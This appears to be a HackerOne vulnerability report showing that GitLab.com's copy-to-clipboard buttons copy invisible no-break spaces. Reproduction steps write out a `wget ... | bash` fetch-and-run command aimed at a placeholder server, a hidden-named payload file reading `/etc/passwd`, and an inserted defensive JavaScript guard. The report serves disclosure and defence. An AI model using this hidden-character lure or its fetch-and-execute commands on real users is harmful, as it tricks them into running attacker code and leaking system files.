Copying information to the clipboard could lead to the execution of unexpected commands
HackerOne report #1805604 by st4nly0n
on 2022-12-14, assigned to GitLab Team
Report
Summary
GitLab.com's web interface lets a user copy the contents of a file, or a selected portion of text, to the clipboard by clicking a link or button.
This is convenient: the user no longer has to select and copy the text by hand; a single click places it on the clipboard of his system.
It is also a security weakness. Some non-printable characters, i.e. characters that do not have a graphical representation in ASCII, are not displayed in any way in the GitLab.com web interface, yet they are copied to the clipboard when the copy button described above is used.
This enables several attack scenarios. In one of them the victim is made to copy to the clipboard a shell command that, as displayed, poses no security risk; when the victim pastes the copied command into his terminal, he may instead be executing an arbitrary system command injected by the attacker.
An example is fetching the contents of a web server with the Wget tool and piping them into `bash` or `sh` for execution; the command looks like `wget -O - https://<YOUR-SERVER>/file.sh | bash`.
By common sense, the obvious thing for the victim to do is first check what `https://<YOUR-SERVER>/file.sh` contains; to do so he selects the URL and inspects the file separately. If `https://<YOUR-SERVER>/file.sh` poses no security risk, the victim can then execute the command on his system without any problem.
The problem is that when the victim uses the web interface button to copy the text to the clipboard, the unprintable, hidden characters are copied along with it. The victim has actually copied `wget -O - https://<YOUR-SERVER>/file.sh\xc2\xa0| bash` (the bytes `\xc2\xa0` are the UTF-8 encoding of a no-break space), and when he runs it he is not executing the contents of `file.sh` but the contents of the file named `file.sh\xc2\xa0`.
In this sense, the web interface does not guarantee the security of information placed on the clipboard when the copy-text button is used.
It should be noted that, for the proof of concept and to minimize the steps to reproduce this problem, you will use your own server to serve the files; however, I have used a different repository on GitLab to host the files, using the blob URL of the raw file, since a blob represents a file that cannot be changed, as it is part of a commit.
Also note that although the attacker uses a repository to build the attack scenario here, this attack can be performed in any text box that supports Markdown, for example a comment anywhere in the web interface.
Steps To Reproduce
- You must perform the following steps as the attacking user
1. Create a file on your server named `hello.sh` with the content `echo "hello world"`:

   ```bash
   echo 'echo "hello world"' > hello.sh
   ```
2. Create a file on your server named `hello.sh<\xc2\xa0>` with any payload (the command the victim will execute). The name of this file contains a non-printable character, so run the following command to create it:

   ```bash
   echo {payload} > $'hello.sh\xc2\xa0'
   ### EXAMPLE
   echo 'cat /etc/passwd' > $'hello.sh\xc2\xa0'
   ```
3. Create a public repository with any name, e.g. `poc`, and initialize it with a `README.md` file.
4. Clone the `poc` repository and enter its directory:

   ```bash
   git clone <repo>
   cd <repo>
   ```
5. Edit `README.md` so that it contains `wget -O - https://<YOUR-SERVER>/hello.sh<\xc2\xa0>| bash`. This command contains a non-printable character, so run the following command to write the file:

   ````bash
   echo -e $'```bash\nwget -O - https://<YOUR-SERVER>/hello.sh\xc2\xa0| bash\n```' > README.md
   ````
6. Push the changes to the remote:

   ```bash
   git add README.md
   git commit -m <commit-message>
   git push origin HEAD -f
   ```
Watch the following video demonstrating the attack scenario. Notice that the victim decides to execute the command displayed in the web interface; he first verifies the content of the remote file and sees that executing the command poses no security risk. However, when he uses the button to copy the command and pastes it into his terminal, the unexpected arbitrary command injected by the attacker is executed.
PoC on Linux: poc_linux.mp4
PoC on Windows: poc_windows.mp4
What is the current bug behavior?
The copy-to-clipboard button in the web interface copies non-printable characters to the clipboard, so a victim who copies a command from the web interface in order to run it on his system may end up executing unexpected commands.
What is the expected correct behavior?
Non-printable characters must be represented to the user through the web interface.
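The expected behavior above, as an added example that is not GitLab's own code: a check a copy-to-clipboard button can run before handing text over, which flags code points that render as blank or invisible (such as the U+00A0 in the summary's command) and renders each one visibly. The host `example.invalid`, the function names and the list of named code points are assumptions of this example.

```javascript
// Added example (not GitLab's code): flag hidden code points before a copy-to-clipboard action.

// Ordinary whitespace that legitimately appears in source text and commands.
const ALLOWED = new Set([0x20, 0x09, 0x0a, 0x0d]);

// Zs = space separators (NBSP, en/em space, ...), Cf = format characters (zero-width
// space/joiner, bidi controls, BOM, ...), Cc = controls (NUL, ESC, DEL, ...; tab/LF/CR allowed above).
const HIDDEN = /[\p{Zs}\p{Cf}\p{Cc}]/gu;

// Names for the code points this example labels; any other match is reported by number only.
const NAMES = {
  0xa0: 'NO-BREAK SPACE', 0xad: 'SOFT HYPHEN', 0x200b: 'ZERO WIDTH SPACE',
  0x200c: 'ZERO WIDTH NON-JOINER', 0x200d: 'ZERO WIDTH JOINER',
  0x202e: 'RIGHT-TO-LEFT OVERRIDE', 0x2066: 'LEFT-TO-RIGHT ISOLATE',
  0x2069: 'POP DIRECTIONAL ISOLATE', 0xfeff: 'ZERO WIDTH NO-BREAK SPACE',
};

function hexOf(cp) {
  return 'U+' + cp.toString(16).toUpperCase().padStart(4, '0');
}

// One finding per hidden code point: UTF-16 index, U+XXXX label and a name where known.
function findHiddenChars(text) {
  const findings = [];
  for (const m of text.matchAll(HIDDEN)) {
    const cp = m[0].codePointAt(0);
    if (ALLOWED.has(cp)) continue;
    findings.push({ index: m.index, codePoint: hexOf(cp), name: NAMES[cp] || 'unnamed' });
  }
  return findings;
}

// Replace each hidden code point with a visible <U+XXXX> token: this is what the
// web interface should show the reader instead of rendering nothing at all.
function revealHiddenChars(text) {
  return text.replace(HIDDEN, (ch) => {
    const cp = ch.codePointAt(0);
    return ALLOWED.has(cp) ? ch : `<${hexOf(cp)}>`;
  });
}

// Clipboard guard: ok is false when anything hidden is present, so the UI can
// refuse a silent copy and display the revealed form and the findings instead.
function guardClipboardText(text) {
  const findings = findHiddenChars(text);
  return { ok: findings.length === 0, findings, display: revealHiddenChars(text) };
}

// Constructed sample: the report's command with U+00A0 glued onto the file name.
const SAMPLE = 'wget -O - https://example.invalid/hello.sh\u00a0| bash';
console.log(guardClipboardText(SAMPLE));
```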
Output of checks
This bug happens on GitLab.com
Impact
An attacker gets a victim to execute unexpected arbitrary system commands if the victim copies, from the web interface, a command that at first glance poses no security risk, pastes it into his terminal and executes it.
For the proof of concept the victim only launched the calculator on his system; in practice, an attacker would use what is described in this report to gain control of the victim's system or obtain confidential information. The attack therefore impacts the confidentiality, integrity and availability of the affected user.